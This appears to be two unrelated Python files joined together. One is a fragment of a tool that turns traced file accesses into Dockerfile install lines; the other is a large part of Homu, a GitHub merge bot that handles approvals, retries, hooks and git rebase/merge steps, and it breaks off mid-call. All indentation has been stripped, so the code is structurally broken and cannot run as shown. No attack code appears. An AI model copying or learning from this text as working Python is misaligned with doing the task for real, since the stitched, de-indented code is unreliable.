# __libc_start_main([ "python", "TestProgs/mineit_mysql_select.py" ] <unfinished ...>
return objInstance.Executable.find("/python") >= 0 or objInstance.Executable.startswith("python")
except AttributeError:
# We do not know the executable, or it is a thread.
return False
@staticmethod
def is_executable_file(objDataFile):
for file_extension in [".py", ".pyc", ".pyd"]:
if objDataFile.Name.endswith(file_extension):
return True
return False
def generate_docker_dependencies(self, fdDockerFile):
# FIXME: TODO: Remove these hardcodes.
packagesToInstall = set()
for objDataFile in self.m_accessedCodeFiles:
filNam = objDataFile.Name
if filNam.find("packages") >= 0:
# Now this trucates the file name to extract the Python package name.
# filNam = '/usr/lib64/python2.7/site-packages/MySQLdb/constants/CLIENT.pyc'
splitFil = filNam.split("/")
try:
ixPack = splitFil.index("site-packages")
except ValueError:
try:
ixPack = splitFil.index("dist-packages")
except ValueError:
ixPack = -1
pass
if (ixPack >= 0) and (ixPack < len(splitFil) - 1):
pckNam = splitFil[ixPack + 1]
if not pckNam.endswith(".py") and not pckNam.endswith(".pyc"):
# filNam = 'abrt_exception_handler.py'
packagesToInstall.add(splitFil[ixPack + 1])
elif filNam.startswith("/usr/lib/python2.7/"):
# Then a source file coming with Python: "/usr/lib/python2.7/string.py"
pass
else:
# Must avoid copying file from the standard installation and always available, such as:
# "ADD /usr/lib64/python2.7/cgitb.py /"
# TODO: Use the right path:
if not filNam.startswith("/usr/lib64/python2.7"):
AddToDockerDir(filNam)
if packagesToInstall or self.m_accessedCodeFiles:
InstallLinuxPackage(fdDockerFile, "python")
for onePckgNam in sorted(packagesToInstall):
# TODO: Do not duplicate Python modules installation.
InstallPipModule(fdDockerFile, onePckgNam)
class DependencyPerl(Dependency):
DependencyName = "Perl scripts"
def __init__(self):
super(DependencyPerl, self).__init__()
@staticmethod
def is_dependency_of(objInstance):
try:
return objInstance.Executable.find("/perl") >= 0
except AttributeError:
# We do not know the executable, or it is a thread.
return False
@staticmethod
def is_executable_file(objDataFile):
return objDataFile.Name.endswith(".pl")
def generate_docker_dependencies(self, fdDockerFile):
for objDataFile in self.m_accessedCodeFiles:
filNam = objDataFile.Name
fdDockerFile.write("RUN cpanm %s\n" % filNam)
pass
class DependencyBinary(Dependency):
DependencyName = "Binary programs"
def __init__(self):
super(DependencyBinary, self).__init__()
@staticmethod
def is_dependency_of(objInstance):
# Always true because tested at the end as a default.
# The executable should at least be an executable file.
return True
@staticmethod
def is_executable_file(objDataFile):
return objDataFile.Name.find(".so") > 0
@staticmethod
# This detects the libraries which are always in the path.
#
def IsSystemLib(filNam):
basNam = os.path.basename(filNam)
if basNam in ["ld.so.cache", "ld.so.preload"]:
return True
# Eliminates the extension and the version.
noExt = basNam[: basNam.find(".")]
noExt = noExt[: noExt.find("-")]
if noExt in ["libdl", "libc", "libacl", "libm", "libutil", "libpthread"]:
return True
return False
def generate_docker_dependencies(self, fdDockerFile):
# __libc_start_main([ "python", "TestProgs/mineit_mysql_select.py" ] <unfinished ...>
# return objInstance.Executable.find("/python") >= 0 or objInstance.Executable.startswith("python")
lstAccessedPackages, unpackagedAccessedCodeFiles = G_FilesToPackagesCache.get_packages_list(
self.m_accessedCodeFiles)
fdDockerFile.write("# Package installations:\n")
for namPackage in sorted(lstAccessedPackages):
InstallLinuxPackage(fdDockerFile, namPackage)
fdDockerFile.write("\n")
fdDockerFile.write("# Non-packaged executable files copies:\n")
sortAccessedCodeFiles = sorted(unpackagedAccessedCodeFiles, key=lambda x: x.Name)
for objDataFile in sortAccessedCodeFiles:
filNam = objDataFile.Name
AddToDockerDir(filNam)
_dependencies_list = [
DependencyPython(),
DependencyPerl(),
DependencyBinary(),
]
accessedDataFiles = set()
# This is the complete list of extra executables which have to be installed.
lstBinaryExecutables = set()
# This is a subset of _dependencies_list.
setUsefulDependencies = set()
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
for oneDep in _dependencies_list:
# Based on the executable of the process,
# this tells if we might have dependencies of this type: Python Perl etc...
if oneDep.is_dependency_of(objInstance):
setUsefulDependencies.add(oneDep)
break
for filAcc in objInstance.m_ProcessFileAccesses:
oneFile = filAcc.m_objectCIM_DataFile
if oneDep and oneDep.is_executable_file(oneFile):
oneDep.AddDep(oneFile)
else:
accessedDataFiles.add(oneFile)
try:
anExec = objInstance.m_ExecutableObject
# sys.stdout.write("Add exec=%s tp=%s\n" % (anExec,str(type(anExec))))
lstBinaryExecutables.add(anExec)
except AttributeError:
pass
# Install or copy the executables.
# Beware that some of them are specifically installed: Python, Perl.
fdDockerFile.write("################################# Executables:\n")
lstPackages, unknownBinaries = G_FilesToPackagesCache.get_packages_list(lstBinaryExecutables)
for anExec in sorted(lstPackages):
InstallLinuxPackage(fdDockerFile, anExec)
fdDockerFile.write("\n")
# This must be done after the binaries are installed: For example installing Perl packages
# with CPAN needs to install Perl.
fdDockerFile.write("################################# Dependencies by program type\n")
for oneDep in setUsefulDependencies:
fdDockerFile.write("# Dependencies: %s\n" % oneDep.DependencyName)
oneDep.generate_docker_dependencies(fdDockerFile)
fdDockerFile.write("\n")
# These are not data files.
categoriesNotInclude = set([
"Temporary files",
"Pipes and terminals",
"Kernel file systems",
"System config files",
"Connected TCP sockets",
"Other TCP/IP sockets",
])
lstPackagesData, unpackagedDataFiles = G_FilesToPackagesCache.get_packages_list(accessedDataFiles)
setPythonModules, unknownDataFiles = _files_to_python_modules(unpackagedDataFiles)
if setPythonModules:
fdDockerFile.write("# Python modules:\n")
for onePyModu in sorted(setPythonModules):
InstallPipModule(fdDockerFile, onePyModu)
fdDockerFile.write("\n")
fdDockerFile.write("# Data packages:\n")
# TODO: Many of them are probably already installed.
for anExec in sorted(lstPackagesData):
InstallLinuxPackage(fdDockerFile, anExec)
fdDockerFile.write("\n")
if unknownDataFiles:
fdDockerFile.write("# Data files:\n")
# Sorted by alphabetical order.
# It would be better to sort it after filtering.
sortedDatFils = sorted(unknownDataFiles, key=lambda x: x.Name)
for datFil in sortedDatFils:
# DO NOT ADD DIRECTORIES.
if datFil.Category in categoriesNotInclude:
continue
filNam = datFil.Name
if filNam.startswith("/usr/include/"):
continue
if filNam.startswith("/usr/bin/"):
continue
if filNam.startswith("UnknownFileDescr:"):
continue
if filNam in ["-1", "stdin", "stdout", "stderr", "."]:
continue
# Primitive tests so that directories are not copied.
if filNam.endswith("/.") or filNam.endswith("/"):
continue
AddToDockerDir(filNam, datFil.Category)
fdDockerFile.write("\n")
################################################################################
|
main.py
|
import argparse
import github3
import toml
import json
import re
import functools
from . import comments
from . import utils
from .parse_issue_comment import parse_issue_comment
from .auth import verify as verify_auth
from .utils import lazy_debug
import logging
from threading import Thread, Lock, Timer
import time
import traceback
import sqlite3
import requests
from contextlib import contextmanager
from queue import Queue
import os
import sys
from enum import IntEnum, Enum
import subprocess
from .git_helper import SSH_KEY_FILE
import shlex
import random
import weakref
STATUS_TO_PRIORITY = {
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
'success': 6,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
DEFAULT_TEST_TIMEOUT = 3600 * 10
VARIABLES_RE = re.compile(r'\${([a-zA-Z_]+)}')
IGNORE_BLOCK_START = '<!-- homu-ignore:start -->'
IGNORE_BLOCK_END = '<!-- homu-ignore:end -->'
IGNORE_BLOCK_RE = re.compile(
r'<!--\s*homu-ignore:start\s*-->'
r'.*'
r'<!--\s*homu-ignore:end\s*-->',
flags=re.MULTILINE | re.DOTALL | re.IGNORECASE
)
global_cfg = {}
# Replace @mention with `@mention` to suppress pings in merge commits.
# Note: Don't replace non-mentions like "email@gmail.com".
def suppress_pings(text):
return re.sub(r'\B(@\S+)', r'`\g<1>`', text) # noqa
# Replace any text between IGNORE_BLOCK_START and IGNORE_BLOCK_END
# HTML comments with an empty string in merge commits
def suppress_ignore_block(text):
return IGNORE_BLOCK_RE.sub('', text)
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(
repo_cfg['buildbot']['url'] + '/login',
allow_redirects=False,
data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
db_query_lock = Lock()
def db_query(db, *args):
with db_query_lock:
db.execute(*args)
class Repository:
treeclosed = -1
treeclosed_src = None
gh = None
gh_test_on_fork = None
label = None
db = None
def __init__(self, gh, repo_label, db):
self.gh = gh
self.repo_label = repo_label
self.db = db
db_query(
db,
'SELECT treeclosed, treeclosed_src FROM repos WHERE repo = ?',
[repo_label]
)
row = db.fetchone()
if row:
self.treeclosed = row[0]
self.treeclosed_src = row[1]
else:
self.treeclosed = -1
self.treeclosed_src = None
def update_treeclosed(self, value, src):
self.treeclosed = value
self.treeclosed_src = src
db_query(
self.db,
'DELETE FROM repos where repo = ?',
[self.repo_label]
)
if value > 0:
db_query(
self.db,
'''
INSERT INTO repos (repo, treeclosed, treeclosed_src)
VALUES (?, ?, ?)
''',
[self.repo_label, value, src]
)
def __lt__(self, other):
return self.gh < other.gh
class PullReqState:
num = 0
priority = 0
rollup = 0
squash = False
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
delegate = ''
def __init__(self, num, head_sha, status, db, repo_label, mergeable_que,
gh, owner, name, label_events, repos, test_on_fork):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.db = db
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.timeout_timer = None
self.test_started = time.time()
self.label_events = label_events
self.test_on_fork = test_on_fork
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
fmt = 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'
return fmt.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
-self.priority,
self.rollup,
self.num,
]
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def get_issue(self):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
return issue
def add_comment(self, comment):
if isinstance(comment, comments.Comment):
comment = "%s\n<!-- homu: %s -->" % (
comment.render(), comment.jsonify(),
)
self.get_issue().create_comment(comment)
def change_labels(self, event):
event = self.label_events.get(event.value, {})
removes = event.get('remove', [])
adds = event.get('add', [])
unless = event.get('unless', [])
if not removes and not adds:
return
issue = self.get_issue()
labels = {label.name for label in issue.iter_labels()}
if labels.isdisjoint(unless):
labels.difference_update(removes)
labels.update(adds)
issue.replace_labels(list(labels))
def set_status(self, status):
self.status = status
if self.timeout_timer:
self.timeout_timer.cancel()
self.timeout_timer = None
db_query(
self.db,
'UPDATE pull SET status = ? WHERE repo = ? AND num = ?',
[self.status, self.repo_label, self.num]
)
# FIXME: self.try_ should also be saved in the database
if not self.try_:
db_query(
self.db,
'UPDATE pull SET merge_sha = ? WHERE repo = ? AND num = ?',
[self.merge_sha, self.repo_label, self.num]
)
def get_status(self):
if self.status == '' and self.approved_by:
if self.mergeable is not False:
return 'approved'
return self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
db_query(
self.db,
'INSERT OR REPLACE INTO mergeable (repo, num, mergeable) VALUES (?, ?, ?)', # noqa
[self.repo_label, self.num, self.mergeable]
)
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
db_query(
self.db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
db_query(
self.db,
'DELETE FROM build_res WHERE repo = ? AND num = ?',
[self.repo_label, self.num]
)
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
db_query(
self.db,
'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
builder,
res,
url,
self.merge_sha,
])
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label].gh
if not repo:
repo = self.gh.repository(self.owner, self.name)
self.repos[self.repo_label].gh = repo
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def get_test_on_fork_repo(self):
if not self.test_on_fork:
return None
repo = self.repos[self.repo_label].gh_test_on_fork
if not repo:
repo = self.gh.repository(
self.test_on_fork['owner'],
self.test_on_fork['name'],
)
self.repos[self.repo_label].gh_test_on_fork = repo
assert repo.owner.login == self.test_on_fork['owner']
assert repo.name == self.test_on_fork['name']
return repo
def save(self):
db_query(
self.db,
'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, squash, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', # noqa
[
self.repo_label,
self.num,
self.status,
self.merge_sha,
self.title,
self.body,
self.head_sha,
self.head_ref,
self.base_ref,
self.assignee,
self.approved_by,
self.priority,
self.try_,
self.rollup,
self.squash,
self.delegate,
])
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = suppress_pings(issue.body)
self.body = suppress_ignore_block(self.body)
def fake_merge(self, repo_cfg):
if not repo_cfg.get('linear', False):
return
if repo_cfg.get('autosquash', False):
return
issue = self.get_issue()
title = issue.title
# We tell github to close the PR via the commit message, but it
# doesn't know that constitutes a merge. Edit the title so that it's
# clearer.
merged_prefix = '[merged] '
if not title.startswith(merged_prefix):
title = merged_prefix + title
issue.edit(title=title)
def change_treeclosed(self, value, src):
self.repos[self.repo_label].update_treeclosed(value, src)
def blocked_by_closed_tree(self):
treeclosed = self.repos[self.repo_label].treeclosed
return (treeclosed if self.priority < treeclosed else None,
self.repos[self.repo_label].treeclosed_src)
def start_testing(self, timeout):
self.test_started = time.time() # FIXME: Save in the local database
self.set_status('pending')
wm = weakref.WeakMethod(self.timed_out)
def timed_out():
m = wm()
if m:
m()
timer = Timer(timeout, timed_out)
timer.start()
self.timeout_timer = timer
def timed_out(self):
print('* Test timed out: {}'.format(self))
self.merge_sha = ''
self.save()
self.set_status('failure')
utils.github_create_status(
self.get_repo(),
self.head_sha,
'failure',
'',
'Test timed out',
context='homu')
self.add_comment(comments.TimedOut())
self.change_labels(LabelEvent.TIMED_OUT)
def record_retry_log(self, src, body):
# destroy ancient records
db_query(
self.db,
"DELETE FROM retry_log WHERE repo = ? AND time < date('now', ?)",
[self.repo_label, global_cfg.get('retry_log_expire', '-42 days')],
)
db_query(
self.db,
'INSERT INTO retry_log (repo, num, src, msg) VALUES (?, ?, ?, ?)',
[self.repo_label, self.num, src, body],
)
@property
def author(self):
"""
Get the GitHub login name of the author of the pull request
"""
return self.get_issue().user.login
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
class AuthState(IntEnum):
# Higher is more privileged
REVIEWER = 3
TRY = 2
NONE = 1
class LabelEvent(Enum):
APPROVED = 'approved'
REJECTED = 'rejected'
CONFLICT = 'conflict'
SUCCEED = 'succeed'
FAILED = 'failed'
TRY = 'try'
TRY_SUCCEED = 'try_succeed'
TRY_FAILED = 'try_failed'
EXEMPTED = 'exempted'
TIMED_OUT = 'timed_out'
INTERRUPTED = 'interrupted'
PUSHED = 'pushed'
PORTAL_TURRET_DIALOG = ["Target acquired", "Activated", "There you are"]
PORTAL_TURRET_IMAGE = "https://cloud.githubusercontent.com/assets/1617736/22222924/c07b2a1c-e16d-11e6-91b3-ac659550585c.png" # noqa
def parse_commands(body, username, user_id, repo_label, repo_cfg, state,
my_username, db, states, *, realtime=False, sha='',
command_src=''):
global global_cfg
state_changed = False
_reviewer_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.REVIEWER,
realtime,
my_username,
)
_try_auth_verified = functools.partial(
verify_auth,
username,
user_id,
repo_label,
repo_cfg,
state,
AuthState.TRY,
realtime,
my_username,
)
hooks = []
if 'hooks' in global_cfg:
hooks = list(global_cfg['hooks'].keys())
commands = parse_issue_comment(username, body, sha, my_username, hooks)
for command in commands:
found = True
if command.action == 'approve':
if not _reviewer_auth_verified():
continue
approver = command.actor
cur_sha = command.commit
# Ignore WIP PRs
is_wip = False
for wip_kw in ['WIP', 'TODO', '[WIP]', '[TODO]', '[DO NOT MERGE]']:
if state.title.upper().startswith(wip_kw):
if realtime:
state.add_comment(comments.ApprovalIgnoredWip(
sha=state.head_sha,
wip_keyword=wip_kw,
))
is_wip = True
break
if is_wip:
continue
# Sometimes, GitHub sends the head SHA of a PR as 0000000
# through the webhook. This is called a "null commit", and
# seems to happen when GitHub internally encounters a race
# condition. Last time, it happened when squashing commits
# in a PR. In this case, we just try to retrieve the head
# SHA manually.
if all(x == '0' for x in state.head_sha):
if realtime:
state.add_comment(
':bangbang: Invalid head SHA found, retrying: `{}`'
.format(state.head_sha)
)
state.head_sha = state.get_repo().pull_request(state.num).head.sha # noqa
state.save()
assert any(x != '0' for x in state.head_sha)
if state.approved_by and realtime and username != my_username:
for _state in states[state.repo_label].values():
if _state.status == 'pending':
break
else:
_state = None
lines = []
if state.status in ['failure', 'error']:
lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.') # noqa
if _state:
if state == _state:
lines.append('- This pull request is currently being tested. If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.') # noqa
else:
lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num)) # noqa
if lines:
lines.insert(0, '')
lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.') # noqa
state.add_comment('\n'.join(lines))
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.try_ = False
state.set_status('')
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(
':scream_cat: {} Please try again with `{}`.'
.format(msg, state.head_sha)
)
else:
state.add_comment(comments.Approved(
sha=state.head_sha,
approver=approver,
bot=my_username,
))
treeclosed, treeclosed_src = state.blocked_by_closed_tree()
if treeclosed:
state.add_comment(
':evergreen_tree: The tree is currently [closed]({}) for pull requests below priority {}. This pull request will be tested once the tree is reopened.' # noqa
.format(treeclosed_src, treeclosed)
)
state.change_labels(LabelEvent.APPROVED)
elif command.action == 'unapprove':
# Allow the author of a pull request to unapprove their own PR. The
# author can already perform other actions that effectively
# unapprove the PR (change the target branch, push more commits,
# etc.) so allowing them to directly unapprove it is also allowed.
# Because verify_auth has side-effects (especially, it may leave a
# comment on the pull request if the user is not authorized), we
# need to do the author check BEFORE the verify_auth check.
if state.author != username:
if not verify_auth(username, user_id, repo_label, repo_cfg,
state, AuthState.REVIEWER, realtime,
my_username):
continue
state.approved_by = ''
state.save()
if realtime:
state.change_labels(LabelEvent.REJECTED)
elif command.action == 'prioritize':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.TRY, realtime, my_username):
continue
pvalue = command.priority
if pvalue > global_cfg['max_priority']:
if realtime:
state.add_comment(
':stop_sign: Priority higher than {} is ignored.'
.format(global_cfg['max_priority'])
)
continue
state.priority = pvalue
state.save()
elif command.action == 'delegate':
if not verify_auth(username, user_id, repo_label, repo_cfg, state,
AuthState.REVIEWER, realtime, my_username):
continue
state.delegate = command.delegate_to
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'undelegate':
# TODO: why is this a TRY?
if not _try_auth_verified():
continue
state.delegate = ''
state.save()
elif command.action == 'delegate-author':
if not _reviewer_auth_verified():
continue
state.delegate = state.get_repo().pull_request(state.num).user.login # noqa
state.save()
if realtime:
state.add_comment(comments.Delegated(
delegator=username,
delegate=state.delegate
))
elif command.action == 'retry' and realtime:
if not _try_auth_verified():
continue
state.set_status('')
if realtime:
event = LabelEvent.TRY if state.try_ else LabelEvent.APPROVED
state.record_retry_log(command_src, body)
state.change_labels(event)
elif command.action in ['try', 'untry'] and realtime:
if not _try_auth_verified():
continue
if state.status == '' and state.approved_by:
state.add_comment(
':no_good: '
'Please do not `try` after a pull request has been `r+`ed.'
' If you need to `try`, unapprove (`r-`) it first.'
)
continue
state.try_ = command.action == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
if realtime and state.try_:
# If we've tried before, the status will be 'success', and this
# new try will not be picked up. Set the status back to ''
# so the try will be run again.
state.set_status('')
# `try-` just resets the `try` bit and doesn't correspond to
# any meaningful labeling events.
state.change_labels(LabelEvent.TRY)
elif command.action == 'rollup':
if not _try_auth_verified():
continue
state.rollup = command.rollup_value
state.save()
elif command.action == 'squash':
if not _try_auth_verified():
continue
state.squash = True
state.save()
elif command.action == 'unsquash':
if not _try_auth_verified():
continue
state.squash = False
state.save()
elif command.action == 'force' and realtime:
if not _try_auth_verified():
continue
if 'buildbot' in repo_cfg:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(
repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', # noqa
allow_redirects=False,
data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())), # noqa
}
)
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err:
err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(
':bomb: Buildbot returned an error: `{}`'.format(err)
)
elif command.action == 'clean' and realtime:
if not _try_auth_verified():
continue
state.merge_sha = ''
state.init_build_res([])
state.save()
elif command.action == 'ping' and realtime:
if command.ping_type == 'portal':
state.add_comment(
":cake: {}\n\n".format(
random.choice(PORTAL_TURRET_DIALOG),
PORTAL_TURRET_IMAGE)
)
else:
state.add_comment(":sleepy: I'm awake I'm awake")
elif command.action == 'treeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(command.treeclosed_value, command_src)
state.save()
elif command.action == 'untreeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(-1, None)
state.save()
elif command.action == 'hook':
hook = command.hook_name
hook_cfg = global_cfg['hooks'][hook]
if hook_cfg['realtime'] and not realtime:
continue
if hook_cfg['access'] == "reviewer":
if not _reviewer_auth_verified():
continue
else:
if not _try_auth_verified():
continue
Thread(
target=handle_hook_response,
args=[state, hook_cfg, body, command.hook_extra]
).start()
else:
found = False
if found:
state_changed = True
return state_changed
def handle_hook_response(state, hook_cfg, body, extra_data):
post_data = {}
post_data["pull"] = state.num
post_data["body"] = body
post_data["extra_data"] = extra_data
print(post_data)
response = requests.post(hook_cfg['endpoint'], json=post_data)
print(response.text)
# We only post a response if we're configured to have a response
# non-realtime hooks cannot post
if hook_cfg['has_response'] and hook_cfg['realtime']:
state.add_comment(response.text)
def git_push(git_cmd, branch, state):
merge_sha = subprocess.check_output(git_cmd('rev-parse', 'HEAD')).decode('ascii').strip() # noqa
if utils.silent_call(git_cmd('push', '-f', 'test-origin', branch)):
utils.logged_call(git_cmd('branch', '-f', 'homu-tmp', branch))
utils.logged_call(git_cmd('push', '-f', 'test-origin', 'homu-tmp'))
def inner():
utils.github_create_status(
state.get_repo(),
merge_sha,
'success',
'',
'Branch protection bypassed',
context='homu',
)
def fail(err):
state.add_comment(
':boom: Unable to create a status for {} ({})'
.format(merge_sha, err)
)
utils.retry_until(inner, fail, state)
utils.logged_call(git_cmd('push', '-f', 'test-origin', branch))
return merge_sha
def init_local_git_cmds(repo_cfg, git_cfg):
fpath = os.path.join(git_cfg["cache_dir"], repo_cfg['owner'], repo_cfg['name']) # noqa
genurl = lambda cfg: 'git@github.com:{}/{}.git'.format(cfg['owner'], cfg['name']) # noqa
if not os.path.exists(SSH_KEY_FILE):
os.makedirs(os.path.dirname(SSH_KEY_FILE), exist_ok=True)
with open(SSH_KEY_FILE, 'w') as fp:
fp.write(git_cfg['ssh_key'])
os.chmod(SSH_KEY_FILE, 0o600)
if not os.path.exists(fpath):
print("initialized local git repository at", fpath)
utils.logged_call(['git', 'init', fpath])
remotes = {
'origin': genurl(repo_cfg),
'test-origin': genurl(repo_cfg.get('test-on-fork', repo_cfg)),
}
for remote, url in remotes.items():
try:
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', remote, url]) # noqa
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', '--push', remote, url]) # noqa
except subprocess.CalledProcessError:
utils.logged_call(['git', '-C', fpath, 'remote', 'add', remote, url]) # noqa
return lambda *args: ['git', '-C', fpath] + list(args)
def branch_equal_to_merge(git_cmd, state, branch):
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return utils.silent_call(git_cmd('diff', '--quiet', 'FETCH_HEAD', branch)) == 0 # noqa
def create_merge(state, repo_cfg, branch, logger, git_cfg,
ensure_merge_equal=False):
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
state.refresh()
lazy_debug(logger,
lambda: "create_merge: attempting merge {} into {} on {!r}"
.format(state.head_sha, branch, state.get_repo()))
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title,
state.body)
squash_msg = '{}\n\n{}'.format(
state.title,
state.body)
desc = 'Merge conflict'
comment = (
'This pull request and the master branch diverged in a way that cannot'
' be automatically merged. Please rebase on top of the latest master'
' branch, and let the reviewer approve again.\n'
'\n'
'<details><summary>How do I rebase?</summary>\n\n'
'Assuming `self` is your fork and `upstream` is this repository,'
' you can resolve the conflict following these steps:\n\n'
'1. `git checkout {branch}` *(switch to your branch)*\n'
'2. `git fetch upstream master` *(retrieve the latest master)*\n'
'3. `git rebase upstream/master -p` *(rebase on top of it)*\n'
'4. Follow the on-screen instruction to resolve conflicts'
' (check `git status` if you got lost).\n'
'5. `git push self {branch} --force-with-lease` *(update this PR)*\n\n'
'You may also read'
' [*Git Rebasing to Resolve Conflicts* by Drew Blessing](http://blessing.io/git/git-rebase/open-source/2015/08/23/git-rebasing-to-resolve-conflicts.html)' # noqa
' for a short tutorial.\n\n'
'Please avoid the ["**Resolve conflicts**" button](https://help.github.com/articles/resolving-a-merge-conflict-on-github/) on GitHub.' # noqa
' It uses `git merge` instead of `git rebase` which makes the PR commit' # noqa
' history more difficult to read.\n\n'
'Sometimes step 4 will complete without asking for resolution. This is'
' usually due to difference between how `Cargo.lock` conflict is'
' handled during merge and rebase. This is normal, and you should still' # noqa
' perform step 5 to update this PR.\n\n'
'</details>\n\n'
).format(branch=state.head_ref.split(':', 1)[1])
if git_cfg['local_git']:
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
utils.silent_call(git_cmd('rebase', '--abort'))
utils.silent_call(git_cmd('merge', '--abort'))
if repo_cfg.get('linear', False):
utils.logged_call(
git_cmd('checkout', '-B', branch, state.head_sha))
try:
args = [base_sha]
if repo_cfg.get('autosquash', False):
args += ['-i', '--autosquash']
utils.logged_call(git_cmd('-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
*args))
except subprocess.CalledProcessError:
if repo_cfg.get('autosquash', False):
utils.silent_call(git_cmd('rebase', '--abort'))
if utils.silent_call(git_cmd('rebase', base_sha)) == 0:
desc = 'Auto-squashing failed'
comment = ''
else:
ap = '<try>' if state.try_ else state.approved_by
text = '\nCloses: #{}\nApproved by: {}'.format(state.num, ap)
msg_code = 'cat && echo {}'.format(shlex.quote(text))
env_code = 'export GIT_COMMITTER_NAME={} && export GIT_COMMITTER_EMAIL={} && unset GIT_COMMITTER_DATE'.format(shlex.quote(git_cfg['name']), shlex.quote(git_cfg['email'])) # noqa
utils.logged_call(git_cmd('filter-branch', '-f',
'--msg-filter', msg_code,
'--env-filter', env_code,
'{}..'.format(base_sha)))
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
utils.logged_call(git_cmd(
'checkout',
'-B',
'homu-tmp',
state.head_sha))
ok = True
if repo_cfg.get('autosquash', False):
try:
merge_base_sha = subprocess.check_output(
git_cmd(
'merge-base',
base_sha,
state.head_sha)).decode('ascii').strip()
utils.logged_call(git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
'-i',
'--autosquash',
'--onto',
merge_base_sha, base_sha))
except subprocess.CalledProcessError:
desc = 'Auto-squashing failed'
comment = ''
ok = False
if state.squash:
try:
merge_base_sha = subprocess.check_output(
git_cmd(
'merge-base',
base_sha,
state.head_sha)).decode('ascii').strip()
utils.logged_call(git_cmd(
'reset',
'--soft',
merge_base_sha))
utils.logged_call(git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'commit',
'-m',
squash_msg))
except subprocess.CalledProcessError:
desc = 'Squashing failed'
comment = ''
ok = False
if ok:
utils.logged_call(git_cmd('checkout', '-B', branch, base_sha))
try:
subprocess.check_output(
git_cmd(
'-c',
'user.name=' + git_cfg['name'],
